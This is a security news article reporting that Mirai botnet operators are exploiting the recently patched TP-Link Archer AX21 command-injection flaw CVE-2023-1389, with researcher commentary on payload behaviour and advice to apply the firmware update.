Threat actors are targeting a recently patched TP-Link vulnerability in order to add compromised routers worldwide to the Mirai botnet, in a likely attempt to launch distributed denial-of-service (DDoS) attacks.
The vulnerability (CVE-2023-1389) exists in the TP-Link Archer AX21 Wi-Fi router and was originally discovered during the Pwn2Own Toronto event in December. After disclosure, TP-Link released a firmware update in March addressing the flaw - however, after this fix was made public researchers with the Zero Day Initiative threat hunting team began to detect exploit attempts in the wild starting on April 11.
“Seeing this CVE being exploited so quickly after the patch being released is a clear demonstration of the decreasing ‘time-to-exploit’ speed that we continue to see across the industry,” said Peter Girnus, senior threat researcher with Trend Micro’s Zero Day Initiative in a Monday analysis. “That said, this is nothing new for the maintainers of the Mirai botnet, who are known for quickly exploiting IoT devices to maintain their foothold in an enterprise.”
The high-severity vulnerability stems from the localeAPI endpoint (in the web management interface) allowing unauthenticated command injection. While teams from Viettel and Tenable targeted the functionality on the LAN side of the router at Pwn2Own Toronto, the team from Qrious Security during the contest was able to exploit the flaw on the router’s WAN interface via a race condition issue related to the iptable handling on the WAN-side processing; this then enabled them to chain the race condition bug with the localeAPI command injection to gain code execution. Both issues were resolved by TP-Link’s patch.
Researchers said they first saw activity targeting devices in Eastern Europe, but detections have now popped up across the globe. The attackers are using the TP-Link flaw to make HTTP requests to the Mirai command-and-control (C2) servers, in order to execute a number of binary payloads for various system architectures.
“Applying this patch is the only recommended action to address this vulnerability, and we recommend all users of the TP-Link Archer AX21 Wi-Fi router apply it as soon as possible."
“The binary payloads are downloaded and then executed using brute-force methodology to find the appropriate payload for the target system architecture,” said Girnus. “Once the appropriate binary is found and the payload is installed, the host becomes fully infected and establishes a connection with the Mirai C2.”
After decrypting several strings in the payloads, researchers discovered several Mirai bot attack functions, including a TSource Engine Query attack functionality that can be used to launch a Valve Source Engine (VSE) DDoS attack against game servers, indicating one of the possible end goals behind the campaign.
The decrypted strings also reveal several specific User-Agent strings and server headers enabling the bot to imitate legitimate traffic, which would make it difficult to discern malicious traffic used for a DDoS attack from legitimate network traffic.
The Mirai botnet is known for the massive 2016 DDoS attack against DNS provider Dyn that crippled Internet service in the U.S. and took down several popular services. Since then, the malware has expanded its methods of gaining initial access beyond the use of known default credentials to also include exploiting vulnerabilities in targets, which are usually IoT devices like home routers, IP cameras or DVRs. In 2022, for instance, attackers exploited a previously uncovered flaw in the Spring framework to deploy the Mirai malware on vulnerable devices.
In 2016, Mirai’s alleged author also released its source code, making it easier for copycats to launch their own Mirai variants (such as Moobot and RapperBot).
Girnus stressed that applying the available TP-Link updates would block a potential infection: “Applying this patch is the only recommended action to address this vulnerability, and we recommend all users of the TP-Link Archer AX21 Wi-Fi router apply it as soon as possible,” he said.